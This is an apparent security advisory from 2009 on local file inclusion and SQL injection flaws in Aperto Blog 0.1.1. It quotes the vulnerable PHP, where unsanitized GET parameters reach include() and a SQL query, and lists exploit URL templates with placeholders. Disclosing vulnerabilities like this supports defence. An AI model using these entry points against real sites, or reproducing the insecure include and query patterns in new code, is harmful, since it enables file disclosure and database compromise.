Aperto Blog 0.1.1 Local File Inclusion / SQL Injection Vulnerabilities

2009.01.03
Credit: NoGe
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

=========================================================================================================== [o] Aperto Blog 0.1.1 Local File Inclusion and SQL Injection Vulnerabilities Software : Aperto Blog version 0.1.1 Vendor : http://code.google.com/p/apertoblog/ Download : http://code.google.com/p/apertoblog/downloads/list Author : NoGe Contact : noge[dot]code[at]gmail[dot]com Blog : http://evilc0de.blogspot.com =========================================================================================================== [o] Vulnerable file admin.php if(isset($_GET['action'])) { if($_GET['action']=="logout") { session_destroy(); go('index.php'); } else { if(file_exists($_GET['action'].".php")) { include($_GET['action'].".php"); } else { echo "404"; index.php if(!$_GET['get']) { $articles = mysql_query("SELECT * FROM articles ORDER BY id DESC LIMIT 10"); while($row = mysql_fetch_array($articles)) { showarticle($row, $settings[5]); } } elseif(file_exists($_GET['get'].".php")) { include($_GET['get'].".php"); } else { echo "404"; categories.php if(isset($_GET['id'])) { $cid = $_GET['id']; //Load category info $getcat = mysql_query("SELECT * FROM categories WHERE id='$cid'"); [o] Exploit [ Local File Inclusion ] http://localhost/[path]/admin.php?action=[LFI] http://localhost/[path]/index.php?get=[LFI] [ SQL Injection ] http://localhost/[path]/categories.php?id=[SQL] =========================================================================================================== [o] Greetz MainHack BrotherHood [ http://mainhack.com/ ] Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa H312Y yooogy mousekill }^-^{ kaka11 martfella skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ] ===========================================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top